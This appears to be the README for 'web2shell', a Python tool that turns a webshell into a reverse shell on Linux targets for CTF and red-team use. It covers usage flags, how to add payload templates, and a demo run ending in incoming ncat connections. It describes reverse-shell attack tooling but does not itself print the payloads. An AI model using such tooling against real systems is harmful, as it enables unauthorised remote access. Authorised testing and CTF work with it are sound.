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Automate converting webshells into reverse shells.


A Python program used to automate converting webshells into reverse shells. If you regularly do CTF, HTB, or red teaming you've probably spent a good chunk of time testing payloads to convert a webshell into a reverse shell. This tool aims to simplify this process.

Credit for the reverse shells goes to PayloadAllTheThings.


usage: web2shell [-h] [-v] [-i INTERFACE] [--force] [--ip IP] [--port PORT] [--nc NC] [--only [ONLY ...]] url

Automate converting webshells into reverse shells.

positional arguments:
  url                   webshell URL, replace the provided command with "SHELL". ex: https://example.com/shell.php?cmd=SHELL

  -h, --help            show this help message and exit
  -v, --verbose         verbose command output
  -i INTERFACE, --interface INTERFACE
                        the interface to use when listening for a remote shell. If none is provided you will be prompted to select one.
  --force               force command execution even if initial check is invalid
  --ip IP               IP address of your own listener (skips listener setup if both IP and port are set)
  --port PORT           port of your own listener
  --nc NC               path to local nc binary
  --only [ONLY ...]     list of bins to test, ignores all others. ex: --only python php node

Providing an IP and port will cause the program to skip the listener setup and assume you already have netcat/a comparable listener running at that address.

Please note: this program currently is only intended to be used on and against Linux machines.


Install the required python modules with pip (pip3 install -r requirements.txt.) You will need a local copy of nc. The program will attempt to find it automatically. If it can't (it might not be in your $PATH), please specify the path to the binary with the --nc flag.

Adding New Payloads

The included payloads have all been tested on a simple webshell and work. If you'd like to add more, please feel free.

  • Edit the data/payloads.py file.
  • Add a new object to the payloads dict. The key should be the name of the bin, and the value should be a list object of payloads.
  • Replace all instances of the reverse IP with IPHERE, the port with PORTHERE, and the binary name with PATHHERE. If the payload specifies the shell replace it with SHELLHERE.


Example execution on local Docker image (see demo/README.md)

[evan@ejedev web2shell]$ python3 web2shell.py

               o                  o           o  o
               O     .oOOo.       O           O  O
               O          O       o           o  o
               o          o       O           O  O
'o     O .oOo. OoOo.     O' .oOo  OoOo. .oOo. o  o
 O  o  o OooO' O   o    O   `Ooo. o   o OooO' O  O
 o  O  O O     o   O  .O        O o   O O     o  o
 `Oo'oO' `OoO' `OoO' oOoOoO `OoO' O   o `OoO' Oo Oo
                v0.1.2   @ejedev

Verifying commands can be executed...
Available interfaces...
[-] lo
[-] enp4s0
[-] br-3bd00064871f
[-] docker0
[-] br-a01c69609a5e
[-] br-a193929c6ae4
[-] br-aa3534e13396
[-] br-c7551daa06d2
[-] br-2369a8165a53
[-] veth7b49643
No interface provided. Please enter the name of an available interface or 'exit' to quit:
> docker0
docker0 selected. Address to use is
Testing ports...
[x] 1025 already in use or unavailable.
[-] 1026 available!
Finding local nc binary...
nc target at /usr/bin/nc
Final connection string will be
Finding bins...
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::1026
Ncat: Listening on
[-] perl found at /usr/bin/perl
[-] php found at /usr/local/bin/php
[-] python3 found at /usr/bin/python3
[-] ruby found at /usr/bin/ruby
[-] go found at /usr/bin/go
[-] node found at /usr/bin/node
Finding shells...
[-] bash found at /usr/bin/bash
[-] sh found at /usr/bin/sh
Executing reverse shell...
Bins to test: 6
Shells to test: 2
[!] Attempting perl payloads for path /usr/bin/perl
Ncat: Connection from
Ncat: Connection from